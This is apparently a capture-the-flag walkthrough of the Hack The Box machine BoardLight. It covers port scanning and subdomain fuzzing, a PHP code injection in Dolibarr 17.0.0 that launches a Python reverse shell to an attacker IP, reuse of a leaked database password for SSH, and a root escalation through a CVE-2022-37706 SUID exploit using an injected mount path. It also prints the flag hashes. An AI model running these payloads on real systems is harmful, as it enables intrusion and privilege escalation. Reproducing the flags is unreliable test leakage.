HTB - BoardLight [Easy]
TCP Scan
> TARGET=10.129.66.131 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- board.htb
enum
> dirsearch -u board.htb
[05:43:02] 200 - 2KB - /about.php
[05:43:37] 404 - 16B - /composer.phar
[05:43:39] 200 - 2KB - /contact.php
[05:43:40] 301 - 304B - /css -> http://board.htb/css/
[05:43:59] 301 - 307B - /images -> http://board.htb/images/
> wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://board.htb/" -H "Host: FUZZ.board.htb" --hl 107
000000072: 200 149 L 504 W 6360 Ch "crm"
crm.board.htb
- Dolibarr 17.0.0
- login with admin:admin
- refer to https://www.swascan.com/security-advisory-dolibarr-17-0-0/
- go to http://crm.board.htb/user/perms.php?id=2, check permission
- go to http://crm.board.htb/website/index.php
- create a website and a page,
Enable shown dynamis content
<section id="mysection1" contenteditable="true">
<?PHP
echo system('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.88",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
?>
</section>
user
www-data@boardlight:~/html/crm.board.htb$ cat /var/www/html/crm.board.htb/htdocs/conf/conf.php
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
- login as
larissa:serverfun2$2023!!
bf1e3632f43839aa80313e8256cc82fd
root
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary)
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
# cat /root/root.txt
cf458a339a7408c1dbfaf89087851347
https://www.exploit-db.com/exploits/51180 https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack